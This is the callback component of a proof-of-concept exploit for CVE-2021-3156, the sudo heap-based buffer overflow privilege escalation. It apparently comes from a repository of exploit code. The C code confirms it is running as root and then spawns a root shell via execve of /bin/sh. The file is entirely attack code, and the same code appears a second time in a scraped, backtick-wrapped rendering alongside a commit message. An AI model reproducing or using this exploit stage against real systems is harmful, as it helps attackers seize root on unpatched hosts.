0day/00-CVE_EXP/CVE-2021-3156/callback.c

/*
	CVE-2021-3156 PoC - sudo heap-based buffer overflow privilege escalation
	
	@lockedbyte
	
	-- This is just the callback code --
*/

#define _GNU_SOURCE
#include <stdio.h>

int main(void) {
    puts("[+] callback executed!");
    if(getuid() == 0)
    	puts("[+] we are root!");
    else {
    	puts("[-] something went wrong!");
    	exit(1);
    }
    execve("/bin/sh", NULL, NULL);
    return 0;
}
add cve exp add cve exp 2022-01-13 16:10:52 +08:00			`/*`
			`CVE-2021-3156 PoC - sudo heap-based buffer overflow privilege escalation`

			`@lockedbyte`

			`-- This is just the callback code --`
			`*/`

			`#define _GNU_SOURCE`
			`#include <stdio.h>`

			`int main(void) {`
			`puts("[+] callback executed!");`
			`if(getuid() == 0)`
			`puts("[+] we are root!");`
			`else {`
			`puts("[-] something went wrong!");`
			`exit(1);`
			`}`
			`execve("/bin/sh", NULL, NULL);`
			`return 0;`
			`}`